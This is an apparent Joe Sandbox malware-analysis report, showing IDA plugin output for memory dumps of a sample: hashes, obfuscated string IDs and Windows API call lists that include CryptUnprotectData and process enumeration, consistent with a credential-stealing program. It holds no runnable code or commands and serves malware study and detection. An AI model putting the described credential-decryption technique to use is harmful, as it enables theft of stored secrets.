                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?$,{$6Hy$N+n$\d~$epz;$pf_
                            • API String ID: 0-2905619878
                            • Opcode ID: 1ec64974d77e2758eb17665d1e23032acd0e1bec273bda7d85c5425959937157
                            • Instruction ID: 8d090ccf7fc150a4b335944c32455cf98d83adfa3b0d275fcb5e0f3b38c2013c
                            • Opcode Fuzzy Hash: 1ec64974d77e2758eb17665d1e23032acd0e1bec273bda7d85c5425959937157
                            • Instruction Fuzzy Hash: F1B249F360C2049FE304AE2DEC8567BBBE6EB94320F16463DE6C4C7744EA7598058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =1v]$d;$$em}$f|Wk$z$~'$5s
                            • API String ID: 0-3393998685
                            • Opcode ID: 9495eee6fc0ac9b9eb2885b3a47ee5846d813653f638125b055a07de54bf4f50
                            • Instruction ID: 20c69f245880632fc63a89a94a4207fe391a479f9190878085002cfdceee1860
                            • Opcode Fuzzy Hash: 9495eee6fc0ac9b9eb2885b3a47ee5846d813653f638125b055a07de54bf4f50
                            • Instruction Fuzzy Hash: 56B208F360C2049FE304AE2DEC8567AF7D9EF94620F1A463DEAC5C7744EA3598018696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .5c}$9jw$E{_y$cj{_$giJ$pXv
                            • API String ID: 0-3838268587
                            • Opcode ID: 6d1abc04efd3a116c379cc4f3269d28032aac32cf1d7c1a43dfe6cec56484310
                            • Instruction ID: 0910f37ec9ef7d3d965c481c7afb7390c9e6e6c87c7aebc529b6f52e0dbbc4c2
                            • Opcode Fuzzy Hash: 6d1abc04efd3a116c379cc4f3269d28032aac32cf1d7c1a43dfe6cec56484310
                            • Instruction Fuzzy Hash: E9B2F7F3A086049FE304AE2DDC8567AF7E6EFD4720F1A893DE6C487744EA3558018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !4e-$-5V1$?v?$[T}}$v%v?$%ww
                            • API String ID: 0-2688252102
                            • Opcode ID: fe3aabe72e5a815891d870929d38822ce86cf07e70e6c21fee89d0cc540707a9
                            • Instruction ID: 82af2bd1a9dc893e24072952579f6faad62f53bb3b9a465d528d092863dd810b
                            • Opcode Fuzzy Hash: fe3aabe72e5a815891d870929d38822ce86cf07e70e6c21fee89d0cc540707a9
                            • Instruction Fuzzy Hash: B0A2D6F3A0C6109FE304AE2DEC8567AFBE5EF94720F16492DEAC4C7744EA3558418792
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00D82C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00D82C58
                            • wsprintfA.USER32 ref: 00D82C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 7164ce69d9da6b4fe4e133d9780de2d590bc31f3d1f161b0e4a52ab74a0d1628
                            • Instruction ID: 3e4873836cd230e60a722d195f436cef038eb3b6f19ac11c03cea3cf1c86b291
                            • Opcode Fuzzy Hash: 7164ce69d9da6b4fe4e133d9780de2d590bc31f3d1f161b0e4a52ab74a0d1628
                            • Instruction Fuzzy Hash: 4901F771A04608ABDB289B6DDC4AB69BB69EB85721F00432AF915D72D0D7B4190487E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "^D7$3Vo_$D>?$GvU$PW$E_
                            • API String ID: 0-590295921
                            • Opcode ID: 820106d66245bd41b3da293bb1590d21efb159ec350612a2aeb6221b6787f5d6
                            • Instruction ID: b737d478d799e4440d0c94ce7a01f7c5ed73392bdd6e79633ce424f9f7f5e4c8
                            • Opcode Fuzzy Hash: 820106d66245bd41b3da293bb1590d21efb159ec350612a2aeb6221b6787f5d6
                            • Instruction Fuzzy Hash: FE8228F360C2049FE704AE2DEC8567ABBE9EFD4720F1A863DE6C4C3744E93558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &o~$3#v$CZ{u$J+n?$r!(
                            • API String ID: 0-1822108732
                            • Opcode ID: 1ff4e59151eee3dfd99bcb44bcabea297d48129b2d673fd2f66894d603b72a08
                            • Instruction ID: 49d0a0a35d4f4119cfa041e577c9eebeea2e09c009edc174e35eece883f415f0
                            • Opcode Fuzzy Hash: 1ff4e59151eee3dfd99bcb44bcabea297d48129b2d673fd2f66894d603b72a08
                            • Instruction Fuzzy Hash: 76B2F5F3A0C2109FE304AE29EC8567AFBE9EF94720F16493DE6C4C7744E63558058697
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00D6775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D67765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00D6778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00D677AD
                            • LocalFree.KERNEL32(?), ref: 00D677B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: d64c5765cb6a0e40a33b94bf2470dfddb34cb58787712584b0824ba281c4dbd5
                            • Instruction ID: 63fb19834b6cc34fcd98983550d0e12bad1541b2de54238b91bc16711f9a99eb
                            • Opcode Fuzzy Hash: d64c5765cb6a0e40a33b94bf2470dfddb34cb58787712584b0824ba281c4dbd5
                            • Instruction Fuzzy Hash: 5F015275B44308BBEB10DBA89C0AFAA7778EB44B14F004149FB08EA2D0D6B0990087A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +^B~$F3yo$ir;$+}
                            • API String ID: 0-2380019094
                            • Opcode ID: ec0494b4bef41d3519bfe6482ae122b0b57fbdb930c9e247ee04a5a30bc797a1
                            • Instruction ID: 24c6a48071c54bbc00f634eb9de68070278be400c446be4d280bec64c334398a
                            • Opcode Fuzzy Hash: ec0494b4bef41d3519bfe6482ae122b0b57fbdb930c9e247ee04a5a30bc797a1
                            • Instruction Fuzzy Hash: D4B2E4F360C2049FE308AE2DEC8567AFBE9EB94720F16493DE6C5C3744EA7558048697
                            APIs
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D83A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00D83AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00D83ABF
                              • Part of subcall function 00D87310: lstrlen.KERNEL32(------,00D65BEB), ref: 00D8731B
                              • Part of subcall function 00D87310: lstrcpy.KERNEL32(00000000), ref: 00D8733F
                              • Part of subcall function 00D87310: lstrcat.KERNEL32(?,------), ref: 00D87349
                              • Part of subcall function 00D87280: lstrcpy.KERNEL32(00000000), ref: 00D872AE
                            • CloseHandle.KERNEL32(00000000), ref: 00D83BF7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: a5d60ed518f117d6e238d8378135b992c86b0c0978f8782e87b1b0da529a31cc
                            • Instruction ID: 66582350035e1f8f178bb8d03fca1316a6a24c66fd640da45c6f486670107eab
                            • Opcode Fuzzy Hash: a5d60ed518f117d6e238d8378135b992c86b0c0978f8782e87b1b0da529a31cc
                            • Instruction Fuzzy Hash: 4D81E670905208CFD714DF19D948B95B7B1FB44729F2AC1AED40C9B2A2D776AD82CFA0
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00D6EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00D6EA7E
                            • lstrcat.KERNEL32(00D8CFEC,00D8CFEC), ref: 00D6EB27
                            • lstrcat.KERNEL32(00D8CFEC,00D8CFEC), ref: 00D6EB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 88b49c4382628c6740c0634f8b750a9e6a01a0ab29cdddaed4ca0cadc1b6eafa
                            • Instruction ID: 30c46eba582ff52dc2b8f4254192e6ccd24553f30f0f5670c8a16f06d99ddec9
                            • Opcode Fuzzy Hash: 88b49c4382628c6740c0634f8b750a9e6a01a0ab29cdddaed4ca0cadc1b6eafa
                            • Instruction Fuzzy Hash: 2D310475A1411CABEB10EB98EC45FEFB77DDF44705F04416AFA09E6240DBB15A088BB2
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00D840CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00D840DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D840E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00D84113
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
